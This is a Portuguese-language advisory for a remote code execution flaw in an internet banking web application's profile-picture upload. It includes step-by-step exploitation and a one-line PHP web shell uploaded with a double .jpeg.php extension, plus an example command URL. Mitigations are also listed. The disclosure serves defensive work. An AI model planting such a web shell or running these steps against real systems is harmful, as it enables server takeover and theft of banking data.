CVE-2025-29017 - Internet Banking System 2.0.0 Execução Remota de Código através do Upload de Foto de Perfil
Descrição
Uma vulnerabilidade de Execução Remota de Código (RCE) existe no Code Astro Internet Banking System 2.0.0 devido à validação inadequada de upload de arquivos no parâmetro profile_pic dentro de pages_view_client.php. Atacantes podem contornar as verificações de segurança modificando a requisição de upload, levando à execução arbitrária de código.
Componente Afetado
- Parâmetro
profile_pic em pages_view_client.php
- A função de upload permite execução de arquivo PHP malicioso
Passos de Exploração
- Navegue até as configurações do perfil do usuário e procure por uma nova foto de perfil.


- Intercepte a requisição de upload da foto de perfil usando uma ferramenta como Burp Suite.

- Modifique o arquivo para dupla extensão (.jpeg.php), altere o cabeçalho Content-Type para application/x-php e anexe código PHP malicioso:
<?php system($_GET['cmd']); ?>


- Você pode verificar se o arquivo foi enviado em /admin/dist/img/:
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Impacto
- Comprometimento Total do Servidor
- Roubo de Dados
- Escalonamento de Privilégios
Mitigação
- Restringir uploads de arquivos apenas a formatos de imagem e verificar os tipos MIME.
- Sanitizar nomes de arquivos e bloquear arquivos que contenham código executável.
- Armazenar arquivos enviados fora da raiz web.
Referências
- OWASP Segurança de Upload de Arquivos